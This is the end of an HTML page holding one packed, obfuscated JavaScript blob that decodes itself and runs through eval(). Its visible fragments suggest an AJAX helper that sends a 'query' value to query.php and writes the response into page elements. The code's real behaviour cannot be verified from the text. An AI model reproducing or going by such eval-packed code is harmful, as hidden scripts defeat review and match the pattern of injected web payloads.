`eQ#e$7&<b%7*3P5$c#6%b%W4%1%c^w/a!6!7&3-4-9-a-b-d*3B0%e-c-@<<<1!0J/eL!fL#<aKL#4F/9#4E#?9#6E#7ET>4!5#7!5#9!5#a!5#bU/6#6!6#7!6#G6#e!6*6>9!0#a!0#Z0#@0#eJ/7&6!7&9!7&a!7&Z7*7P?0&6!0&7!0&8!0&9J/1&Z1&@1&G1&eN*1>Rc%eI%c%XbD$cT>0&<b%b&0Q#f#4#6*3>fD#aKE|%8EEJ>0#5%1%6%0%?f%b#5*7H1%0%1ELLL#cQ*1Hd$W3!fI^*7\\7:"32);ev",&%W8$X6$c&b%0%1:"al(l)\\'",!7!7!0&9zN!0#8y:");"};dk=[] E-r x in v){dk.push(trim(x,v))};e-l(dk 7\\'\\'))!v7#v8$vb%vc&v9*:8+,q-va/+7<0!>+8?5!@c!AvdB,bD#1E!9F:90Gd!H,cI$bJ*0K#2L!aM$9N!8O$aP+9Q$6R7%T*9U*5V$5W8%Xd%Ye#Zb!^#0_%3`$4w*8y&2z%2|!c~*2\\,#6#?e$2&<Wfy!\' Ec=46;c--;d=(t=d 5\'!#$%&*+-/<>?@ABDEFGHIJKLMNOPQRTUVWXYZ^_`wyz|~\\\'[c])) 7t.pop())); 8 &=d J %}; 8unAJAX Nj C3 L ,B ]* ca(g_j); 3 cc ,T 0 Wc)} 3 b CBself=this; 3 G=="GET"){g_m= v+ w+ Wg + Xg_m U * X v U;try{ b.setRequestHeader("Content-Type","application/x-www-form-urlencoded" 4){}} b.onreadystatechange !){switch( #b.readyState){case 1: #y /2: #z /3: #A /4: := #b.r &Text; :XML= #b.r &XML; #r[0 T; #r[1 TText; 3#M){self.r H 3#T C(= #T.nodeName; (.toLowerCase(); 3(=="input Iselect Ioption Itextarea" C#T. ?= : *#T.innerHTML= :}} 3#r[0]=="200" C#D ]*#C()} #cg="";break} Qb.send( Wg)}} Qu ]+cd()} [.ajax 9g_p();try{ Bg_K 0\'g_J\') )o("query",g_K _F _h) )v="query.php" )G OK _G _h )cc=\'g_cb\' )y Oa )z Od )A Oe )D Of; K 4){ K)} this _ !=function( #self _ $encodeURIComponent( %e +cc >T >v=file +g 9Object ]+r 9 .(2) &esponse (elemNodeName );ajax _ *}else{ +; , C -try{ b 9ActiveXObject("M .Array /();break;case 0=document.getElementById( 2true 3if( 4)}catch(e 5.split( 6.length 7.join( 8this.r 9=new :self.r & ;T" +w="?" +cf="&" +c <return = !){ Q >=null + ?value @ g[key][ A(g_k[0],g_k[1]) Bvar C){ E;for( FXMLHttpRequest HunR &()} I"|| (==" J +P= 2 +M=fals Kajax.runAJAX( M ,cg+= Wf+g_ N !g_ O=g_ Q} + RbIO#6z% T]= #b.status U, 2) V.XMLHTTP" 4 W c Xb.open( G, Y ! , Zg_ce [window ]() ^g_h[g_E]} _.g_ `#a#';for(c=112;c;d=(t=d.split(' ! # $ % & ( ) * + , - . / 0 2 3 4 5 6 7 8 9 : ; < = > ? @ A B C E F H I J K M N O Q R T U V W X Y Z [ ] ^ _ `'.substr(c-=(x=c<2?1:2),x))).join(t.pop()));eval(d)</script></body> </html>